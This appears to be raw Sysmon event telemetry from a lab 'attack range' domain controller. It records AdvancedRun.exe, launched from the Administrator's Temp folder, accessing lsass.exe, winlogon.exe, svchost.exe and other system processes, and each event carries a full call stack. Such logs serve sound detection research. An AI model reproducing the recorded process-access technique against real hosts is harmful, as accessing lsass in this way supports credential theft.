20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004075936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.549{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.549{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.549{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004075924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.548{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004075923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.548{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 